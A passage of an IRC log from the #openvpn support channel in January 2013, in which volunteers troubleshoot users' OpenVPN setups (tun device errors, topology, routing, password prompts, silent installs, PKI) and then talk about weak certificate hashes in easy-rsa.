http://znc.sourceforge.net] 20:30 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 20:56 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Connection reset by peer] 21:07 -!- brute11k [~brute11k@89.249.231.124] has joined #openvpn 21:26 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 21:32 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 21:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 22:04 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 22:04 < roue> hola 22:04 < roue> I'm trying to get openvpn running on a Chromebook in dev mode. 22:05 < roue> It's complaining with "SIOCSIFADDR: No such device" when trying to ifconfig tun0 after the initial connection is established with the server. Then it dies. 22:05 < roue> verbose logging > 7 causes a seg fault. 22:05 < roue> it's kinda charming. 22:05 < roue> and no gcc toolchain easily available to rebuild. 22:06 < roue> I can openvpn --mktun --dev tun0 22:06 < roue> the kernel modules is present. 22:06 <+pekster> gcc was my upcoming suggestion :\ 22:06 <+pekster> Is it a debug build? Do you have access to gdb? 22:06 < roue> I can set up a cross compliation env but it's going to take me some time to figure it out. 22:06 < roue> I don't know if it's a debug build. 22:06 <+pekster> openvpn --version should show you 22:07 < roue> I'm also not skilled in way of gdb. --version reports " OpenVPN 2.1.12 i686-pc-linux-gnu [SSL] [LZ02] [EPOLL] [OJCS11] built on Jan 9 2013 22:07 < roue> nothing about debug. 22:07 <+pekster> Debug build sample here (notice all the build options) http://fpaste.org/gZ9v/raw/ 22:07 < roue> But hey, built on Jan 9, so someone is looking at it :) 22:08 <+pekster> Yea, probably not then. Chance are even if you get gdb on the chromebook a backtrace would be worthless without a debug build, and possibly worthless anyway unless frame pointers were kept during the build process 22:08 <+pekster> Sounds like a bad/incomplete build IMO 22:08 < roue> okay, so I'm out of luck until I can compile binaries. 22:08 <+pekster> Does 'openvpn --test-crypto' explode? 22:09 < roue> It wants a --secret. What do I give it? 22:09 <+pekster> Oh, create one first 22:09 <+pekster> 'openvpn --genkey --secret test.key' 22:09 < roue> I tried passing it the private key I'd created for the machine. No dice. 22:09 <+pekster> Then pass it that 22:10 <+pekster> It's not x509; it's a static key 22:10 < roue> Okay, says mode SUCCEEDED. 22:10 <+pekster> Well, not *everything* is broken ;) 22:11 <+pekster> Any hints from the packager? Maybe missing userland packages? I dunno really 22:11 < roue> From the logs it looks like the connection is being established, it's just dying when it tries to configure the network device on the chromebook side. 22:11 <+pekster> Right. I'm wondering if the packager built it targeting some support your system lacks, hence the errors interfacing with the tun device via ifconfig 22:12 <+pekster> roue: You could look at using --ifconfig-noexec and run the userland commands yourself via scripts (call either ifconfig, or, if you can, /sbin/ip since ip is preferred on modern Linuxes) 22:12 < roue> ah, nice idea. 22:13 <+pekster> I dunno if your build was built with iproute2 support, but even if not you can do it all yourself. I forget the exact syntax the env-vars use, but the manpage should provide plenty of details 22:17 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has joined #openvpn 22:17 < king0demons> Hello 22:19 < roue> --ifconfig-noexec dumps core. Fun :) 22:20 < king0demons> Is there a way to turn off logging 22:20 < king0demons> For the server I mean 22:21 <+pekster> king0demons: Why not just lower the verbosity if you don't like how talkative the logs are? Techniaclly you can not pass any of the --log* options and it'll dump to stderr/stdout (which will be dropped if you're not redirecting them) 22:23 <+pekster> See --verb, but even at '--verb 0' you still get fatal errors logged. You probably want that, but you can not redirct it or send it to /dev/null if you really want fatal errors to just exit and not tell you (this is a REALLY BAD idea, but you can do it if you'd like) 22:24 <+pekster> Also possibly relevant depending on how you start it: --daemon 22:26 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 255 seconds] 22:31 <+pekster> Don't send CTCP NOTICES like that; it's really bad form, and you're lucky I even saw it as it gets dumped on my status window 22:31 <+pekster> Read about the --daemon reference I gave you. You can "undo" that behaviour by either hacking your distro's initscript or learning to use syslog properly 22:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has quit [Quit: Nettalk6 - www.ntalk.de] 22:58 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn 22:59 -!- MeanderingCode_ [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Ping timeout: 246 seconds] 23:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 23:17 -!- jthunder [~jthunder@174.3.126.51] has quit [Client Quit] 23:31 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 23:36 -!- Dr_Wendy [~FuckOff@208.102.159.64] has joined #openvpn 23:42 < Dr_Wendy> hi, i think my problem is iptables... but i am not skilled anough to tell... if i am being honest... would one or more of you be kind enough to help me troubleshoot? 23:43 < Dr_Wendy> when i do tail /var/log/syslog... i get this over and over again 23:43 < Dr_Wendy> Jan 29 05:37:30 hostname kernel: [4432473.503949] iptables denied: IN=eth0 OUT= MAC=ff:ff:ff:ff:ff:ff:00:00:00:00:00:00:00:00 SRC=12.34.224.107 DST=12.34.224.255 LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=17500 DPT=17500 LEN=131 23:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 23:49 -!- EugeneKay [EugeneKay@selfloath.in] has quit [Quit: ZNC - http://znc.sourceforge.net] 23:49 -!- EugeneKay [EugeneKay@madeitwor.se] has joined #openvpn 23:50 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn --- Day changed Tue Jan 29 2013 00:05 -!- b1rkh0ff [~b1rkh0ff@31.176.168.75] has quit [Ping timeout: 276 seconds] 00:06 -!- b1rkh0ff [~b1rkh0ff@31.176.156.222] has joined #openvpn 00:23 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 00:25 < Dr_Wendy> any help? 00:32 -!- Cpot-Oblivious is now known as Cpt-Oblivious 00:37 -!- Dr_Wendy [~FuckOff@208.102.159.64] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 00:55 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 00:59 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 01:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 01:20 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 01:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 01:26 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 01:31 -!- master_of_master [~master_of@p57B545F7.dip.t-dialin.net] has joined #openvpn 01:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 01:38 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 01:41 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 01:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 01:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 245 seconds] 01:49 -!- bisko [~bisko@77.70.26.115] has quit [Quit: Textual IRC Client: www.textualapp.com] 01:55 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn 01:58 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:17 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 02:20 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:21 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:36 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 03:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:32 -!- dazo_afk is now known as dazo 03:33 -!- genghi [~Adium@p50899BDD.dip.t-dialin.net] has joined #openvpn 03:36 < genghi> hi… in some docs I see that when using ifconfig-push I can use a netmask like a /24, but other docs imply I must /30. In short, is this statement ever legal: ifconfig-push 10.1.1.5 10.1.1.255 ? 03:36 -!- stephan48 [stephan@opennic/stephan] has joined #openvpn 03:38 < stephan48> hi i am currently using iroue(ccd) file and route(openvpn serverconfig file), is it possible to add routes(route commands) without restarting the openvpn server? 03:38 < kisom> On which side? 03:38 < kisom> Server or client? 03:39 <+pekster> genghi: That depends on your topology, but you probably don't intend to be using p2p topology like that with --ifconfig-push. For 'subnet' or 'net30' topology that's not valid 03:45 -!- Dashers [dash@home.aligrant.com] has joined #openvpn 03:47 < Dashers> How can I retain a route to the VPN server when there is no "external" IP range. 03:47 < genghi> pekster: cool.. gotchya 03:47 < genghi> I missed the net30 part 03:48 <+pekster> genghi: Basically, you don't want to waste IPs by using net30 unless you intend to support OpenVPN versions 2.0.x. 2.1 and higher should use the subnet topology instead 03:48 < Dashers> I'm wanting to use OpenVPN to tunnel through an internal firewall - I allow the VPN connection through to the server, but the connection drops as the routing tables get muddled. 03:49 <+pekster> Now, if you actually need to support both Windows *and* clients running a 2.0.x version, then you have a valid use-case for net30. Otherwise, don't use it ;) 03:49 < genghi> pekster: it seems version +2 uses net30 by default. In my case the clients will be mixed UNIX/Windows, so I must use net30, correct? 03:50 <+pekster> genghi: What is "version +2" ? Are you really running a 2.0.x client? Like 2.0.9? 03:50 <+pekster> I suspect you really want the subnet topology instead, which supports Windows just fine 03:50 < genghi> openvpn-2.2.1-1.el6.x86_64 in this specific case 03:50 < genghi> ok 03:51 <+pekster> See --topology in the manpage for a full breakdown on the choices, but in your case you want subnet, not net30 03:51 < genghi> awesome… thanks 03:51 <+pekster> Dashers: what do you mean no "external IP range" ? 03:52 <+pekster> Dashers: You can route to server-side networks by pushing them from the server to the client. We have a handy guide for that exact situation: 03:52 <+pekster> !serverlan 03:52 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 03:53 < Dashers> Cool, thanks. 03:53 < Dashers> The thing I was getting stuck on was maintaining the route to the server when the server pushes a new gateway for it's subnet. 03:53 < Dashers> But then I found this: http://openvpn.net/archive/openvpn-users/2005-12/msg00074.html 03:53 <@vpnHelper> Title: Re: [Openvpn-users] pushing server network as route to client stops openvpn (at openvpn.net) 03:54 <+pekster> Your networks don't overlap, do they? 03:54 -!- zeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 03:54 < Dashers> Not overlap - but they are the same. i.e. all I'm trying to do is get the client to act as if it was on the opposite side of the firewall (there is no nat routing going on or anything) 03:55 <+pekster> Oh, okay. Just add a more specific route for the VPn server itself; you get variables to identify them under the --route values in the manpage 03:55 < Dashers> Aye, I didn't realise there was variables available - quite handy :D 03:55 < Dashers> Thanks. 03:56 <+pekster> eg: push "route remote_host 255.255.255.255 net_gateway" 03:56 <+pekster> That'll create a /32 (ergo higher priority) route to avoid supernetting your VPN endpoint in the larger route. Remember that this traffic will *not* be encrypted 03:57 <+pekster> Otherwise, you'd need to do some policy routing client-side to identify the VPN traffic and route it using differnet rules if you wanted all non-VPN traffic to that host to be protected too 03:58 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 03:58 <+pekster> Oh, fancy that, the same config line is in that mailing list entry you found :P. Heh. 03:59 < Dashers> You clearly know too much :) 03:59 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Client Quit] 03:59 <+pekster> And if I'd read that further I'd have been able to type less. Something about "work smarter, not harder.." no? :) 03:59 < Dashers> Encryption is not required it's just for getting round a physical restriction on the network. 03:59 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 04:01 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:04 < Dashers> In fact, is it possible to configure it to work without certificates at all? i.e. allow anybody to connect without a client certificate or password? 04:05 <+pekster> Not in multi-client mode, although you could use the same client cert all over with --duplicate-cn, or use un/pw auth and just blindly accept people with an 'exit 0' script to "verify" users 04:05 <+pekster> Every one's a winner! 04:05 <+pekster> A GRE tunnel is probably better suited to that, though 04:05 <+pekster> (Oh, and I suppose not very platform-independent for you, huh?) 04:08 -!- igor_ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn 04:08 <+pekster> See --auth-user-pass-verify and --client-cert-not-required 04:14 -!- zz_AsadH is now known as AsadH 05:04 -!- Dashers [dash@home.aligrant.com] has quit [Quit: blee] 05:15 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 244 seconds] 05:16 -!- dazo is now known as dazo_afk 05:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds] 05:40 < igor_> both --up and --up-delay are not working i have check permissons . i use absolute path . cant find the mistake . excute the script manually is working 06:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:04 < stephan48> kisom: sorry was that an answer to my question? 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:16 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 06:18 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 06:23 -!- p3rror [~mezgani@2001:0:53aa:64c:104e:5b75:d673:4be2] has joined #openvpn 06:29 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 07:23 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 07:26 -!- mufasa27 [~jchamplin@unaffiliated/mufasa27] has joined #openvpn 07:26 < mufasa27> w 07:27 < mufasa27> whenever i try and start openvpn, I cannot connect with error= " cannot read password from stdin" 07:29 -!- p3rror [~mezgani@2001:0:53aa:64c:104e:5b75:d673:4be2] has quit [Read error: Connection reset by peer] 07:45 -!- Fabius [~Sbratzber@187.110.4.106] has joined #openvpn 07:45 <+pekster> mufasa27: Some part of the startup process requires reading a password (probably to decrypt a private key) and you apparently haven't supplied a stream for stdin to read it from 07:46 <+pekster> If you don't start it from the console, you won't have a valid stdin stream and must make other arrangements to supply decryption passphrases (eg: management interface) or decrypt the keys 07:54 < Fabius> Hello, Folks. I Work for a Public company, and we already use OPEN VPN. Great Software. Congratulations. But now, A LOT of people intent to access our server via Open VPN. Several diferent systems. Every kind of aplication. I need to know about the hardware limitations and network trafic limitations for openvpn usage. Any hint?? 07:58 <+pekster> Fabius, the biggest problem to scaling is that openvpn is single-threaded. That effectively limits the number of concurrent users any single instance can support. As long as you load-balance your connections to a suitable number of instances with hardware that can handle the crypto and network load, you'll be set 08:03 < Fabius> pekster, i have today (before scaling) 5 .conf files (5 diferent vpns). Each one has a diferent access (seted by interface on firewall). This setup creates a diferent proccess for eache vpn?? 08:03 <+pekster> Yes, exactly 08:03 < Fabius> or its the same one for all of then? 08:03 < fys> Fuck this hangover in the ASSSSSSS. 08:04 <+pekster> Each instance is a separate openvpn process, which means its own config file 08:05 < Fabius> they think abbout 200 users. They will access a RDP session via VPN. Do you see a disaster? Or maybe it works? 08:05 <+pekster> As long as your hardware supports the load you plan to put on it 08:05 <+pekster> The openvpn mailing lists have some good postings about people benchmarking the CPU and crypto requirements 08:06 <+pekster> Remember that you need at least 1 instance per CPU core you plan to use, otherwise you're just wasting CPUs that'll sit idle 08:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:07 < mufasa27> pekster: how would I supply it a stream if I am launching it from the terminal? 08:08 <+pekster> mufasa27: The terminal provides a stdin process, unless you're somehow disconnecting it 08:09 <+pekster> mufasa27: Do you get the error still if you open a terminal and do 'openvpn --config /path/to/your/config.conf' ? 08:09 < Fabius> pekster, thanks a lot 08:10 < Fabius> oh, a nother question; today i create manualy all the keys. Do you suggest some kind of system (web or not) os script for automating all process?? 08:10 < mufasa27> pekster: yeah, I attempt to startup from the terminal by `openvpn --config /etc/openvpn/client.conf` and it still says that it cannot read pass from stadin 08:10 < mufasa27> atdin* 08:11 < mufasa27> stdin* fuck.. 08:12 <+pekster> mufasa27: Can you pastebin the config? Normally you'll get an interactive prompt if a key needs to be supplied 08:12 <+pekster> Fabius: Maybe this is of use: 08:12 <+pekster> !xca 08:12 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 08:13 <+pekster> I've never used it, but it looks convenient if you don't have your own infrastructure in place 08:19 < mufasa27> pekster: http://pastebin.com/4JJdTN9g 08:20 < mufasa27> pekster: the <> tags are fields that I know and are correct 08:22 <+pekster> The 'pull' directive does not take any parameters (near as I can tell that's not posing a problem for you though) 08:22 <+pekster> Also, that's unnecessary since you already specify 'client' which implies 'pull' 08:23 <+pekster> mufasa27: Otherwise that looks fine. The VPN_URL is the hostname, not a standards-like URI, right? 08:25 < mufasa27> pekster: yeah the vpn.url is a url not uri 08:26 < Fabius> pekster and vpnHelper, Thanks a lot 08:26 < mufasa27> I'm using urxvt as a terminal shell, but that shouldn't cause any problems should it? 08:26 <+pekster> mufasa27: If by "url" you mean http://something, then that's wrong. It needs to be a hostname or an IP that your resolver can turn into an IP 08:26 < mufasa27> also running on archlinux_64 bit 08:27 < mufasa27> pekster: it is vpn.something.com 08:27 <+pekster> Also, it might be an issue if it handles stdin poorly. What happens if you use a standard shell, like bash or even sh? 08:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:29 < mufasa27> pekster: I'm using a standard bash shell. just using urxvt as a shell frontend. 08:29 < mufasa27> I'll try xterm and get back with ya 08:30 <+pekster> There's nothing weird in that config (besides your funky 'pull' line that you can just remove without impact.) Nothing that would hinder the processing of a password for your protected key file, so somehow your shell/console/whatever isn't passing it to openvpn correctly 08:30 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 08:30 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 08:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 08:30 -!- mode/#openvpn [+o krzee] by ChanServ 08:31 < mufasa27> pekster: ok thank you. i'll try another frontend perhaps 08:31 * krzee smells !netman 08:32 <+pekster> No, goofy terminal manager/frontend thing that's somehow eating stdin 08:33 <+pekster> Basic config file that openvpn bails out on when it can't read the decryption passphrase interactively :x 08:34 <@krzee> ahh right 08:34 <@krzee> what frontend? 08:35 -!- mufasa27 [~jchamplin@unaffiliated/mufasa27] has quit [Ping timeout: 248 seconds] 08:36 -!- mufasa27 [~jchamplin@aei-tech.com] has joined #openvpn 08:36 <+pekster> urxvt; I've heard of it, but have no direct expereince 08:39 < mufasa27> pekster: i've tried xterm as well. next step would be to try a pure tty shell 08:39 <+pekster> mufasa27: Weird, that should all be unnecessary. If you add 'verb 4' to the config (or on the CLI, ie: 'openvpn --verb 4 --config foo.conf') does it give you any more hint as to the problem? 08:42 -!- KaiForce [~chatzilla@adsl-70-228-88-232.dsl.akrnoh.ameritech.net] has joined #openvpn 08:43 < mufasa27> pekster: http://pastebin.com/7LWTwCJX 08:44 < KaiForce> is there a known issue with the 64bit client 2.3 version crashing on Windows 08:44 < KaiForce> I've had it happen on two machines. 08:47 <+pekster> mufasa27: That's either not started from the command-line, or you've edited the config file from what you showed me earlier, becuase it's using the 'nobody' user and group. If it still shows the same resulting error that's one thing, but the test doesn't appear the same as what you had issues with before 08:49 <+pekster> The code that causes that error is pretty explicit about the cuase too 08:49 <+pekster> if (!get_console_input ... ) msg (M_FATAL, "ERROR: could not read..."); 08:49 < mufasa27> pekster: http://pastebin.com/H84QFeCh 08:52 <+pekster> huh. Well now I'm stumped. Apparently it's failing to get console input. Besides a really screwed up shell or file descriptor handling on the OS, I'm not sure what to tell you 08:57 <+pekster> mufasa27: You said you're using arch? 08:58 < mufasa27> pekster: yes I am using arch. I could try it from a tty shell and see how that handles it. 08:59 < mufasa27> pekster: I am getting the same error from a tty shell 09:00 <+pekster> You can give it a shot. The code is pretty simple for that function, but it uses a different system call depending on if you built with systemd support or not. In either event, the only reason it fails is when it can't open a tty to perform the read. That's getpass() without systemd, or get_console_input_systemd() if you built with that support 09:00 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn 09:02 < mufasa27> pekster: I built with systemd support so it should call get_console_input_systemd() 09:03 <+pekster> It is doing that if you use --enable-systemd (which is not the default.) It's calling that function, and that function is what's returning a failure status 09:04 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 09:06 <+pekster> Looks like it's trying to use /bin/systemd-ask-password to handle it through systemd. I'm not familiar at all with systemd's method to manage that, so I can't really troubleshoot beyond this besides suggest you rebuild without systemd support 09:06 <+pekster> src/openvpn/console.c starting on line 158 of the 2.3.0 release 09:06 < mufasa27> ok I'll look into it. thank you 09:07 <+pekster> The easier method might just be to remove that option from your build and re-compile 09:08 < mufasa27> then it will default to the old getpass() ? \ 09:09 <+pekster> Yea 09:14 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 09:18 < havoc> can 2.3.0 be deployed/installed silently? 09:18 < havoc> google's not finding anything on it 09:19 <+pekster> What platform? 09:20 < havoc> windows 09:20 < havoc> using the .exe 09:20 < havoc> I tried running it w/ --help, -h, -help, /?, nothing :( 09:20 < havoc> or is this a case where I'd have to build my own installer? 09:21 < havoc> openvpn itself isn't so much of an issue, the TAP-win32 is 09:27 <+pekster> It's built with NSIS, so /S is usually the "standard" silent install flag unless otherwise modified by the install script 09:28 <+pekster> You're still going to have potential UI interaction due to the driver signing stuff, depending on OS and the configuration of the "Local Security Policy" settings for driver installs 09:28 < havoc> ah, /s, thanks 09:28 < havoc> eh, I'll just have to try it 09:28 -!- mufasa27 [~jchamplin@aei-tech.com] has quit [Ping timeout: 248 seconds] 09:30 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 09:30 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Remote host closed the connection] 09:31 -!- bjh4 [~bjh4@64.212.193.1] has quit [Ping timeout: 256 seconds] 09:31 <+pekster> Further reading on NSIS and all its features: http://nsis.sourceforge.net/Docs/Chapter3.html#3.2 09:31 <@vpnHelper> Title: Command Line Usage (at nsis.sourceforge.net) 09:32 < havoc> pekster: thanks much :) 09:32 < KaiForce> anyone aware of 64bit 2.3 client crashing on Windows? 09:41 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn 09:48 <@ecrist> nope 09:53 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:53 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Ping timeout: 255 seconds] 09:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 09:57 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn 09:57 <@krzee> i have also not heard of it crashing anywhere 09:57 <@krzee> see if the log shows anything 09:57 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 09:58 <@krzee> maybe its not crashing but rather exiting with extreme prejudice ;] 09:58 < c3vin> I'm having trouble finding instructions on installing centos client 09:58 < c3vin> can someone assist? 09:59 < c3vin> I have existing openvpn server and would like to configure centos 6.3 to connect 09:59 <@krzee> already got openvpn working correctly when you use openvpn config.conf ? 10:00 < rob0> Probably "yum install openvpn" installs the client. yum(8) questions would be on topic in #centos 10:00 <@krzee> in other words, are you looking for help with openvpn or just configuring openvpn to work with your distro's init script? 10:00 <@krzee> we'll help ya with either, but where to go next depends 10:00 <@krzee> or i will at least… i've run centos a little 10:01 <+pekster> Are they finally up to the 3.x kernels? :P 10:01 <@krzee> no idea =] 10:01 < rob0> 2.4 ;) 10:01 < c3vin> I'm looking for ways to configure openvpn client on centos 6.3 10:02 < c3vin> i've found some different docs that don't encessarily match 10:02 <+pekster> Well, back when I was using 5.3 at $job back then, they got really, really good at back-porting things to 2.6.26 or some-such 10:02 <@krzee> running openvpn on basically ANY os is the same 10:02 < c3vin> I can't find any config files included in default client install 10:02 <@krzee> of course windows / android / ios have some caveats 10:02 <@krzee> supply your own config 10:02 < c3vin> dir /etc/openvpn is empty 10:02 <+pekster> !howto 10:03 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 10:03 <@krzee> openvpn doesnt configure itself ;] 10:03 <+pekster> c3vin: ^^ start with that guide the bot just pasted for you 10:03 < c3vin> yea, I'm just looking for proper guidance 10:03 < c3vin> i'll cehck this out - ty 10:04 < rob0> Probably also look into the CentOS/RHEL documentation for openvpn, as that will tell you where to put your files, what to name them, et c. 10:06 -!- Devastator- [~devas@177.18.197.23] has joined #openvpn 10:06 <@krzee> your client config must match your server config 10:06 <@krzee> like so: 10:06 <@krzee> !sample 10:06 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 10:06 <@krzee> things like compression settings must match, their certs need to be from the same pki 10:06 <@krzee> you're starting at the right place with that howto =] 10:06 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 10:07 < c3vin> so one of my areas of confusion involves client keys/certs 10:07 < c3vin> shoudl those be generated from openvpn server and copied to client/ 10:07 < c3vin> ? 10:07 < c3vin> or generated on client and copied to openvpn folder 10:08 <@krzee> i always recommend generating them all on another machine 10:08 <@krzee> personally i aim for a CA that has no network connection at all 10:08 <@krzee> the ca.key is the cornerstone of pki 10:08 <@krzee> !pki 10:08 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 10:08 <@vpnHelper> signed specially as a server (see !servercert) 10:09 <+pekster> You can geneate the keypair on the client-side, but the certificiate needs to be signed by the same CA you used to create the PKI. If you're using easy-rsa, you must generate the keypairs where you sign them as it has no facility to sign them (at least not via the included scripts) 10:09 < rob0> The way it should work: A client generates its own key and CSR. Send the CSR to the CA. The CA signs the CSR and returns the certificate. 10:09 <@krzee> pekster, you sure? i believe it at least *used to* have the ability to generate keys and sign them separately 10:09 <@krzee> just not as advertised 10:10 <+pekster> If by "not as advertised" you mean "you must manually call openssl" then yes :) 10:10 <@krzee> nah 10:10 <+pekster> rob0: I agree 100% 10:10 <@krzee> i mean not spelt out as clearly in the howto, but its there 10:10 <+pekster> At least not in my Windows install. I don't have easy-rsa cruft installed on my 2 headless systems 10:10 <@krzee> ahh i havnt looked at the windows bats in a long time, and barely looked at them back then 10:11 <@krzee> i meant the nix .sh scripts 10:11 <+pekster> I didn't think they had it either, but maybe I'm wrong 10:11 < c3vin> ok, thanks rob0 that helps 10:11 <@krzee> you're basically neighbors with the easy-rsa maintainer :D 10:13 <@krzee> (twin cities) 10:13 <+pekster> It should be patched to support >sha1. Maybe I'll get motivated to do so in Feb 10:13 <@krzee> what should be patched to support > sha1? 10:13 <@krzee> --tls-auth ? 10:13 <+pekster> easy-rsa 10:13 -!- AsadH is now known as zz_AsadH 10:14 <@krzee> easy-rsa uses sha1 where? 10:14 <@krzee> !easy-rsa 10:14 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 10:15 <+pekster> Oh, I take it back; 2.3.0 (again, at least on Windows) specifies md5 :P 10:16 <+pekster> Again, not a real "problem" except for use in places that (should) have IT folks who know enough to vet the security of "important" systems 10:17 <@krzee> …even worse, whats it using hashes for? 10:17 <@krzee> just for file integrity? 10:19 -!- raidz_away is now known as raidz 10:19 <+pekster> You hash values and sign the hash, so the security relies on the hash to be resistent against collisions. There have been some fun papers showing how when you can (potentially) control some of the output (eg: by sending specially-crafted CRSs) to a CA, you can potentially take advantage of such weaknesses in the hash alg 10:19 <+pekster> There's really no reason not to use at least sha256 these days 10:19 <@krzee> ouch 10:19 <@krzee> i strongly agree in that case 10:21 <+pekster> I won't really matter for some random joe playing around with ovpn at home, and one hopes that "security professionals" know better. Then again, I've seen a lot that need a few clue-by-fours to hit them in the head first :\ 10:21 <@krzee> ya man, your avg gpu these days can rip md5/sha1 right up 10:22 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn 10:23 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:23 <+pekster> Little different, but there was a really cool presentation (I forget what security conference this was, maybe defcon) where researchers showed that a combination of predictable serial numbers and md5 hashing allowed them to purchase a targeted cert and modify it without error in a brorwser 10:24 <+pekster> Solution: use better hashes and random serial numbers :) 10:24 <@krzee> ecrist, ping ^ 10:24 <+pekster> openssl can't really help with the serials, since 